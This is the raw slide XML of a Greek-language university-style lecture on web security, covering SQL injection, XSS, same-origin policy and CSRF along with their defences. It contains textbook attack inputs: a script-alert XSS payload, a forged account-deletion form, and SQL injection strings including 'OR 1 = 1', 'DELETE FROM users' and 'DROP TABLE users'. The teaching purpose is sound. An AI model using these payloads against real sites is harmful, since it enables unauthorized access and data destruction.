                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( ‘XSS’ );&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ziz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&lt;/p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="2000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27984" y="4293096"/>
            <a:ext cx="0" cy="50405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21762" y="5016607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Welcome, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diony</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script type=“text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”&gt;alert( ‘XSS’ );&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ziz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4578672" y="1862969"/>
            <a:ext cx="360040" cy="7403484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10320" y="5908630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>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Δεν εκτελείται, απλώς εμφανίζεται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31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Διάλειμμα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219" b="-113"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-108520" y="2170350"/>
            <a:ext cx="9361040" cy="481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3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Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (CSRF)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Σκοπός </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Κ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>άνουμε τον χρήστη να εκτελέσει ενέργειες χωρίς να το επιθυμεί</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>να αλλάξει το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>του στην εφαρμογή</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>ν</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>α μεταφέρει λεφτά από ένα λογαριασμό σε ένα άλλο</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο επιτιθέμενος δεν μπορεί να κλέψει δεδομένα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>δ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>εν έχει πρόσβαση στην απάντηση από τον </a:t>
            </a:r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6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CSRF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Στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>υπάρχει κουμπί για διαγραφή λογαριασμού</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone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&lt;form action=”/account/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delete”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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 method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="post"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="24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274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el-GR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&lt;input type="submit" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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274320" lvl="1" indent="0">
              <a:buNone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  value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="Delete account" /&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="24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274320" lvl="1" indent="0">
              <a:buNone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&lt;/form&gt;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CSRF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 smtClean="0"/>
              <a:t>Ο χρήστης μπαίνει στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο «κακός» έχει φτιάξει μια φόρμα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone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&lt;form action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=http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://kokkinoskoufitsa.gr/account/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delete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"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</a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone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method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="post"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="24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548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el-GR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&lt;input type="submit" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone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   value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="Play Game" /&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="24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548640" lvl="2" indent="0">
              <a:buNone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&lt;/form&gt; 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l-GR" dirty="0" smtClean="0"/>
              <a:t>Στέλνει το ίδιο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>όπως η φόρμα στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr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249486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CSRF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Ο χρήστης κάνει </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>τη φόρμα</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Νομίζει ότι θα παίξει ένα παιχνίδι στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kakoslykos.gr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l-GR" dirty="0" smtClean="0"/>
              <a:t>Τελικά διαγράφεται ο λογαριασμός του από το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr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Προστασία απέναντι σε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF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Ορθή χρήση των </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μόνο για </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>που ζητούν δεδομένα από τον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POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>για </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>που τροποποιούν δεδομένα στον </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Χρήση </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>σε κάθε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>request, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>το οποίο μετά επαληθεύεται στον </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> παράγονται από κάποιο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>session id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και ένα μυστικό </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>στον </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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17050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Προστασία απέναντι σε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF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lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone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&lt;form action=”http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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kokkinoskoufitsa.gr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/account/delete" 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method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="post"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="24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274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el-GR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&lt;input type="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hidden”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  name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="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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CSRFToken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”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  value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="OWY4NmQwODE4"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="24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274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el-GR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&lt;input type="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submit”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone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  value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="Delete account" /&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="24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274320" lvl="1" indent="0">
              <a:buNone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&lt;/form&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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5620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l-GR" dirty="0" smtClean="0"/>
              <a:t>Ακόμη χειρότερα...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>είναι</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean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dio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’ OR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1 = 1 OR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name = ‘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nyziz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;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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userid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users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password = ‘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ILoveYou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 AND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name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dio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’ OR 1 = 1 OR name = ‘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nyziz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LIMIT 1;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516219" y="5141401"/>
            <a:ext cx="1" cy="5667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0" y="4725144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Δεν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>υπάρχει συντακτικό σφάλμα!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98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237626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password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 ‘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ILoveYou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AND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name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= ‘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dio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OR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 = 1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OR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name = ‘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nyziz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean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(((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password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 ‘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ILoveYou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AND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name = ‘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dio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OR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 =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OR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name = ‘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nyziz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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9553" y="4869160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/>
              <a:t>Αληθές</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Επιλέγει την </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>πρώτη</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> εγγραφή.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9553" y="5301208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 smtClean="0"/>
              <a:t>Συνήθως λογαριασμός </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>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3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$username 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είναι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dio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’; DELETE FROM users; --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userid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users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password = ‘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ILoveYou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 AND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name = ‘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dio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’;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DELETE FROM users; --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 LIMIT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1;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391983" y="6377429"/>
            <a:ext cx="468050" cy="26861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81969" y="6461381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MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>σχόλιο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06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$username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>είναι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dio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’; DROP TABLE users; --</a:t>
            </a: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67893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userid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users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password = ‘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ILoveYou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 AND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name = ‘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dio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’;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DROP TABLE users; --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 LIMIT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1;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417846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4576</TotalTime>
  <Words>1675</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>456</Paragraphs>
  <Slides>57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Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Clarity</vt:lpstr>
      <vt:lpstr>Web security</vt:lpstr>
      <vt:lpstr>Βασική αρχή ασφαλείας του web</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Demo</vt:lpstr>
      <vt:lpstr>Αποφυγή SQL Injection</vt:lpstr>
      <vt:lpstr>Αποφυγή SQL Injection</vt:lpstr>
      <vt:lpstr>Αποφυγή SQL Injection</vt:lpstr>
      <vt:lpstr>Αποφυγή SQL Injection</vt:lpstr>
      <vt:lpstr>Αποφυγή SQL Injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Ποιο είναι το βαθύτερο πρόβλημα;</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Πώς διαχωρίζουμε εντολές/δεδομένα;</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>«Προετοιμασμένα» ερωτήματα</vt:lpstr>
      <vt:lpstr>Client-Side Vulnerabilities</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Χρήσεις Cookies</vt:lpstr>
      <vt:lpstr>Παράδειγμα</vt:lpstr>
      <vt:lpstr>Cookies – Πως μοιάζουν;</vt:lpstr>
      <vt:lpstr>2 σελίδες</vt:lpstr>
      <vt:lpstr>Same-origin policy</vt:lpstr>
      <vt:lpstr>Same-origin policy</vt:lpstr>
      <vt:lpstr>Same-origin policy</vt:lpstr>
      <vt:lpstr>Same-origin policy Demo</vt:lpstr>
      <vt:lpstr>Same origin με το  http://store.company.com/dir/page.html?</vt:lpstr>
      <vt:lpstr>Same origin με το  http://store.company.com/dir/page.html?</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS Demo</vt:lpstr>
      <vt:lpstr>Αποφυγή XSS</vt:lpstr>
      <vt:lpstr>Αποφυγή XSS</vt:lpstr>
      <vt:lpstr>Αποφυγή XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Διάλειμμα</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Παράδειγμα CSRF</vt:lpstr>
      <vt:lpstr>Παράδειγμα CSRF</vt:lpstr>
      <vt:lpstr>Παράδειγμα CSRF</vt:lpstr>
      <vt:lpstr>Προστασία απέναντι σε CSRF</vt:lpstr>
      <vt:lpstr>Προστασία απέναντι σε CSRF</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Kamibu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HTML, CSS</dc:title>
  <dc:creator>Dionysis Zindros</dc:creator>
  <cp:lastModifiedBy>Dionyziz Zindros</cp:lastModifiedBy>
  <cp:revision>285</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-08-21T11:02:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-31T07:59:07Z</dcterms:modified>
</cp:coreProperties>
</file>